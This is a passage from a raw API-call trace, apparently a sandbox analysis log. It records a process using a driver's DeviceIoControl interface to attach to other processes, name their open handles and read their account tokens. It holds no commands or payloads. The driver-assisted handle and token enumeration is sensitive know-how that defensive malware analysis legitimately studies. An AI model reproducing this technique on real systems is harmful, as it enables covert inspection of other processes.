ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.697] ObfDereferenceObject (Object=0xffffe0006a6828a0) returned 0x7ffe [0291.697] IoCompleteRequest () returned 0x0 [0291.697] PsLookupProcessByProcessId (in: ProcessId=0xfa4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.697] PsAcquireProcessExitSynchronization () returned 0x0 [0291.697] KeStackAttachProcess (in: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400) [0291.697] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7052c0, HandleInformation=0x0) returned 0x0 [0291.697] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.697] PsReleaseProcessExitSynchronization () returned 0x2 [0291.697] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x1ffe1 [0291.697] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.697] ObfDereferenceObject (Object=0xffffe0006a7052c0) returned 0x7fe9 [0291.697] IoCompleteRequest () returned 0x0 [0291.697] PsLookupProcessByProcessId (in: ProcessId=0xfa4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.697] PsAcquireProcessExitSynchronization () returned 0x0 [0291.697] KeStackAttachProcess (in: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400) [0291.697] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a705090, HandleInformation=0x0) returned 0x0 [0291.697] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.697] PsReleaseProcessExitSynchronization () returned 0x2 [0291.697] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x1ffe0 [0291.697] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.697] ObfDereferenceObject (Object=0xffffe0006a705090) returned 0x7ffd [0291.697] IoCompleteRequest () returned 0x0 [0291.697] PsLookupProcessByProcessId (in: ProcessId=0xfa4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.697] PsAcquireProcessExitSynchronization () returned 0x0 [0291.697] KeStackAttachProcess (in: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400) [0291.697] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a622380, HandleInformation=0x0) returned 0x0 [0291.697] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.697] PsReleaseProcessExitSynchronization () returned 0x2 [0291.697] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x1ffdf [0291.697] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.697] ObfDereferenceObject (Object=0xffffe0006a622380) returned 0x7ffc [0291.698] IoCompleteRequest () returned 0x0 [0291.698] PsLookupProcessByProcessId (in: ProcessId=0xfa4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.698] PsAcquireProcessExitSynchronization () returned 0x0 [0291.698] KeStackAttachProcess (in: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400) [0291.698] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6abcd0, HandleInformation=0x0) returned 0x0 [0291.698] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.698] PsReleaseProcessExitSynchronization () returned 0x2 [0291.698] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x1ffde [0291.698] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.698] ObfDereferenceObject (Object=0xffffe0006a6abcd0) returned 0xfffa [0291.698] IoCompleteRequest () returned 0x0 [0291.698] PsLookupProcessByProcessId (in: ProcessId=0xfa4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.698] PsAcquireProcessExitSynchronization () returned 0x0 [0291.698] KeStackAttachProcess (in: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e17400, ApcState=0xffffd000ac0cf400) [0291.698] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6abcd0, HandleInformation=0x0) returned 0x0 [0291.698] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.698] PsReleaseProcessExitSynchronization () returned 0x2 [0291.698] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x1ffdd [0291.698] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.698] ObfDereferenceObject (Object=0xffffe0006a6abcd0) returned 0xfff9 [0291.698] IoCompleteRequest () returned 0x0 [0291.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x188 [0291.698] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.698] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a124080, HandleInformation=0x0) returned 0x0 [0291.698] ObOpenObjectByPointer (in: Object=0xffffe0006a124080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.698] ObfDereferenceObject (Object=0xffffe0006a124080) returned 0x28015 [0291.698] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.698] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.698] IoCompleteRequest () returned 0x0 [0291.698] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.698] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.700] CloseHandle (hObject=0x18c) returned 1 [0291.700] CloseHandle (hObject=0x188) returned 1 [0291.700] PsLookupProcessByProcessId (in: ProcessId=0xfac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.700] PsAcquireProcessExitSynchronization () returned 0x0 [0291.700] KeStackAttachProcess (in: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400) [0291.700] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bee630, HandleInformation=0x0) returned 0x0 [0291.700] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.700] PsReleaseProcessExitSynchronization () returned 0x2 [0291.700] ObfDereferenceObject (Object=0xffffe0006a124080) returned 0x20013 [0291.700] ObQueryNameString (in: Object=0xffffe00069bee630, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.700] ObfDereferenceObject (Object=0xffffe00069bee630) returned 0x7fe0 [0291.700] IoCompleteRequest () returned 0x0 [0291.700] PsLookupProcessByProcessId (in: ProcessId=0xfac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.700] PsAcquireProcessExitSynchronization () returned 0x0 [0291.700] KeStackAttachProcess (in: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400) [0291.700] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4ba090, HandleInformation=0x0) returned 0x0 [0291.700] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.700] PsReleaseProcessExitSynchronization () returned 0x2 [0291.700] ObfDereferenceObject (Object=0xffffe0006a124080) returned 0x20012 [0291.700] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.700] ObfDereferenceObject (Object=0xffffe0006a4ba090) returned 0x7ffe [0291.700] IoCompleteRequest () returned 0x0 [0291.700] PsLookupProcessByProcessId (in: ProcessId=0xfac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.700] PsAcquireProcessExitSynchronization () returned 0x0 [0291.700] KeStackAttachProcess (in: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400) [0291.700] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4f63f0, HandleInformation=0x0) returned 0x0 [0291.700] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.700] PsReleaseProcessExitSynchronization () returned 0x2 [0291.700] ObfDereferenceObject (Object=0xffffe0006a124080) returned 0x20011 [0291.700] ObQueryNameString (in: Object=0xffffe0006a4f63f0, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.700] ObfDereferenceObject (Object=0xffffe0006a4f63f0) returned 0x7ffe [0291.700] IoCompleteRequest () returned 0x0 [0291.700] PsLookupProcessByProcessId (in: ProcessId=0xfac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.700] PsAcquireProcessExitSynchronization () returned 0x0 [0291.700] KeStackAttachProcess (in: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400) [0291.700] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6f6090, HandleInformation=0x0) returned 0x0 [0291.700] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.700] PsReleaseProcessExitSynchronization () returned 0x2 [0291.700] ObfDereferenceObject (Object=0xffffe0006a124080) returned 0x20010 [0291.700] ObQueryNameString (in: Object=0xffffe0006a6f6090, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.700] ObfDereferenceObject (Object=0xffffe0006a6f6090) returned 0x7ffe [0291.700] IoCompleteRequest () returned 0x0 [0291.701] PsLookupProcessByProcessId (in: ProcessId=0xfac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.701] PsAcquireProcessExitSynchronization () returned 0x0 [0291.701] KeStackAttachProcess (in: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a124080, ApcState=0xffffd000ac0cf400) [0291.701] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a9532c0, HandleInformation=0x0) returned 0x0 [0291.701] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.701] PsReleaseProcessExitSynchronization () returned 0x2 [0291.701] ObfDereferenceObject (Object=0xffffe0006a124080) returned 0x2000f [0291.701] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.701] ObfDereferenceObject (Object=0xffffe0006a9532c0) returned 0x7fff [0291.701] IoCompleteRequest () returned 0x0 [0291.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe2c) returned 0x188 [0291.701] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.701] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006988c080, HandleInformation=0x0) returned 0x0 [0291.701] ObOpenObjectByPointer (in: Object=0xffffe0006988c080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.701] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x48003 [0291.701] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.701] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.701] IoCompleteRequest () returned 0x0 [0291.701] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.701] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.777] CloseHandle (hObject=0x18c) returned 1 [0291.777] CloseHandle (hObject=0x188) returned 1 [0291.777] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.777] PsAcquireProcessExitSynchronization () returned 0x0 [0291.777] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.777] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a488750, HandleInformation=0x0) returned 0x0 [0291.777] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.777] PsReleaseProcessExitSynchronization () returned 0x2 [0291.777] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x40001 [0291.777] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.777] ObfDereferenceObject (Object=0xffffe0006a488750) returned 0x7ffe [0291.777] IoCompleteRequest () returned 0x0 [0291.777] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.777] PsAcquireProcessExitSynchronization () returned 0x0 [0291.777] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.777] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a295090, HandleInformation=0x0) returned 0x0 [0291.777] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.778] PsReleaseProcessExitSynchronization () returned 0x2 [0291.778] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x40000 [0291.778] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.778] ObfDereferenceObject (Object=0xffffe0006a295090) returned 0x7ffe [0291.778] IoCompleteRequest () returned 0x0 [0291.778] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.778] PsAcquireProcessExitSynchronization () returned 0x0 [0291.778] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.778] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a69eb20, HandleInformation=0x0) returned 0x0 [0291.778] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.778] PsReleaseProcessExitSynchronization () returned 0x2 [0291.778] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3ffff [0291.778] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.778] ObfDereferenceObject (Object=0xffffe0006a69eb20) returned 0x7ffe [0291.778] IoCompleteRequest () returned 0x0 [0291.778] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.778] PsAcquireProcessExitSynchronization () returned 0x0 [0291.778] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.778] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a62f270, HandleInformation=0x0) returned 0x0 [0291.778] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.778] PsReleaseProcessExitSynchronization () returned 0x2 [0291.778] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3fffe [0291.778] ObQueryNameString (in: Object=0xffffe0006a62f270, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.778] ObfDereferenceObject (Object=0xffffe0006a62f270) returned 0x800e [0291.778] IoCompleteRequest () returned 0x0 [0291.778] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.778] PsAcquireProcessExitSynchronization () returned 0x0 [0291.778] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.778] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4eb630, HandleInformation=0x0) returned 0x0 [0291.778] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.778] PsReleaseProcessExitSynchronization () returned 0x2 [0291.778] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3fffd [0291.778] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.778] ObfDereferenceObject (Object=0xffffe0006a4eb630) returned 0x7fde [0291.778] IoCompleteRequest () returned 0x0 [0291.778] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.778] PsAcquireProcessExitSynchronization () returned 0x0 [0291.778] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.778] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a70e210, HandleInformation=0x0) returned 0x0 [0291.778] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.778] PsReleaseProcessExitSynchronization () returned 0x2 [0291.778] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3fffc [0291.778] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.778] ObfDereferenceObject (Object=0xffffe0006a70e210) returned 0x7ffe [0291.779] IoCompleteRequest () returned 0x0 [0291.779] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.779] PsAcquireProcessExitSynchronization () returned 0x0 [0291.779] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.779] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a3bf0, HandleInformation=0x0) returned 0x0 [0291.779] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.779] PsReleaseProcessExitSynchronization () returned 0x2 [0291.779] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3fffb [0291.779] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.779] ObfDereferenceObject (Object=0xffffe000697a3bf0) returned 0x7fff [0291.779] IoCompleteRequest () returned 0x0 [0291.779] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.779] PsAcquireProcessExitSynchronization () returned 0x0 [0291.779] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.779] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a40ec30, HandleInformation=0x0) returned 0x0 [0291.779] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.779] PsReleaseProcessExitSynchronization () returned 0x2 [0291.779] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3fffa [0291.779] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.779] ObfDereferenceObject (Object=0xffffe0006a40ec30) returned 0x7fde [0291.779] IoCompleteRequest () returned 0x0 [0291.779] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.779] PsAcquireProcessExitSynchronization () returned 0x0 [0291.779] KeStackAttachProcess (in: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006988c080, ApcState=0xffffd000ac0cf400) [0291.779] ObReferenceObjectByHandle (in: Handle=0x308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4b6ad0, HandleInformation=0x0) returned 0x0 [0291.779] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.779] PsReleaseProcessExitSynchronization () returned 0x2 [0291.779] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x3fff9 [0291.779] ObQueryNameString (in: Object=0xffffe0006a4b6ad0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.779] ObfDereferenceObject (Object=0xffffe0006a4b6ad0) returned 0x7ffe [0291.779] IoCompleteRequest () returned 0x0 [0291.779] PsLookupProcessByProcessId (in: ProcessId=0xe2c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.779] PsAcquireProcessExitSynchronization () returned 0x0 [0291.779] KeStackAttachProcess (in: 